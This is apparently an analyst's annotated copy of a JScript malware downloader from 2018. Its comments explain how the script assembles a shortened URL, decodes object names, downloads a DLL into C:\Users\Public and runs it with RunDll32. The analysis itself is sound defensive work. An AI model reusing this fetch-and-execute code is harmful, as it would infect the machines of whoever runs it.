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May 15th, 2018
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  1. // JavaScript Document - this was the original comment. I think it's JScript, actually
  2. /* global WScript, exit, eof */
  4. var sID;
  5. var sIDW;
  6. var xID = 91;
  9. var sNomeMaq;
  10. var cFolder = "C:\\Users\\Public\\";
  12. var c1nf3ctz = "";
  13. var sTipoSO;
  14. var sAwvx = "NHYBVGTVFGTDCE";
  15. var cHosttotal;
  16. var NAMEWG141 = "xcty.dll";
  17. var NAMENP413 = "xcty.dll";
  18. var cHost287 = "ht"; // the cHost variables are strung together to form a URL:
  19. var cHost771 = "tp"; //
  20. var cHost983 = ":/";
  21. var cHost300 = "/b";
  22. var cHost529 = "it";
  23. var cHost840 = ".l";
  24. var cHost694 = "y/";
  25. var cHost448 = "2K";
  26. var cHost158 = "OV";
  27. var cHost280 = "f8";
  28. var cHost360 = "Z";
  30. //Determine the filename to use - note this script is assuming that IE is the browser because FF and Chrome don't support ActiveXObject and will throw an error
  31. var network = new ActiveXObject(wdecrypt1064(cWN3t,xID)); // decryption leads to WScript.Network
  32. sNomeMaq = network.computerName; // uses WScript.Network object to get the local computer name
  33. cFolder = cFolder + sNomeMaq.substring(0, 3) + "OLNM822\\"; // C:\Users\Public\ABCOLNM822\ where "ABC" are the 1st three letters of the PC Name
  34. sId = cFolder + "id"; // C:\Users\Public\ABCOLNM822\id where "ABC" are the 1st three letters of the PC Name
  35. sIdW = cFolder + "idw"; // C:\Users\Public\ABCOLNM822\idw where "ABC" are the 1st three letters of the PC Name
  36. cHosttotal = cHost287+cHost771+cHost983+cHost300+cHost529+cHost840+cHost694+cHost448+cHost158+cHost280+cHost360; // the cHost variables are strung together to form
  37. c1nf3ctz = c1nf3ctz +"?tmpString=" + cHosttotal + "&pcn=" + network.computerName+ "&AT=" + 0905; // Decodes to ?tmpString=
  39. //Filename & system checks. Try to download malware and save it to disk
  40. var fso = WScript.CreateObject(wdecrypt1064(cScrF1l3,xID)); // Decodes to: Scripting.FileSystemObject
  41. if (!fso.FileExists(sId) && fso.FolderExists("C:\\Users\\Public\\")) // If the file exists but the folder does not
  42. {
  43. try{
  44. down3546(c1nf3ctz) // Try to download the next stage
  45. }
  46. catch(err) {}
  48. if (!fso.FolderExists(cFolder)) // If the folder does not exist
  49. {
  50. fso.CreateFolder(cFolder); // then create it
  51. }
  53. if (fso.FolderExists("C:\\Program Files (x86)\\")) // Check to deduce whether 32-bit or 64-bit system
  54. {
  55. sTipoSO = "64";
  56. }
  57. else
  58. {
  59. sTipoSO = "32";
  60. }
  62. var s = fso.CreateTextFile(sId, true); //
  63. s.WriteLine(wdecrypt1064(cID,xID)); // Decrypts to: load-s3
  64. s.Close();
  65. var s2 = fso.CreateTextFile(sIdW, true); // Creates C:\Users\Public\ABCOLNM822\idw and...
  66. s2.WriteLine("91"); // writes "91" to it
  67. s2.Close();
  68. try
  69. {
  70. down3546(cHosttotal) // Try to download the next stage
  71. }
  72. catch(err) {}
  74. down3546(cHosttotal, "C:\\Users\\Public\\"+ NAMENP413); // Calls the download function with arguments: URL and filename (c:\\Users\Public\\xcty.dll)
  75. try
  76. {
  77. run1176("RunDll32.exe C:\\Users\\Public\\"+ NAMEWG141 + ",thnde"); // Calls the run function with arguments Rundll32.exe + Filename + ",thnde"
  78. }
  79. catch(err) {}
  80. }
  82. function wdecrypt1064(s1, id) // This function decrypts a path based on the computer name to use for storing the file to be downloaded
  83. {
  84. var sx;
  85. var x;
  86. var x4;
  87. var sr;
  88. var wx1;
  89. var wx2;
  90. var wxgx1;
  91. wxgx1 = 65;
  92. sr = "";
  93. sx = "";
  94. x = 0;
  95. x4 = s1.charCodeAt(0) - wxgx1; // which is 70 - 65 = 5
  96. s1 = s1.substring(1); // which is the variable passed into the function starting at position 1 or HIHEHUIKIBIIIMFRGYHWIMIPIHIKID
  97. while (s1.length > 0){ // s1.length starts as 30
  98. wx1 = (s1.charCodeAt(0)-wxgx1); // This equals 7 on the first run
  99. wx2 = (s1.charCodeAt(1)-wxgx1); // This equals 8 on the first run
  100. sr = sr + String.fromCharCode( wx1 * 25 + wx2 - x4 - id); // This ends up making sr= Wscript.Network
  101. s1 = s1.substring(2); // s1 now equals I and it's used in the loop
  102. }
  103. return sr; // returns: WScript.Network
  104. }
  106. function down3546(url, file) { // This function visits the link at and then ......
  107. var data;
  108. var ado;
  110. try
  111. {
  112. var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1"); // creates the WinHttpRequest object
  114. // ResolveTimeout, ConnectTimeout, SendTimeout, ReceiveTimeout
  115. WinHttpReq.SetTimeouts(30000, 30000, 30000, 5000);
  117. void(WinHttpReq.Open("GET", url, false)); // Calls the Open method
  118. WinHttpReq.Send(); // Assemble the request headers and sends the request
  119. if (WinHttpReq.Status == 404) // If 404 is the status then return "false"
  120. {
  121. return false;
  122. }
  123. data = WinHttpReq.ResponseBody; // Retrieves the response entity body as an array of unsigned bytes. Saves it in variable "data"
  124. }
  125. catch (ex)
  126. {
  127. //WScript.Echo("Error downloading file: " + ex.message);
  128. return false;
  129. }
  131. ado = new ActiveXObject("ADODB.Stream");
  132. ado.Type = 1; // binary mode
  133. ado.Open();
  134. ado.Write(data); // Writes the contents of the "data" variable to disk
  135. ado.SaveToFile(file, 2); // 2 = overwrite existing file
  136. ado.Close();
  138. return true;
  139. }
  141. function run1176(file) { // This function attempts to use WScript.Shell to run the file that was downloaded
  142. var ws = new ActiveXObject("WScript.Shell");
  143. ws.Exec(file);
  144. }
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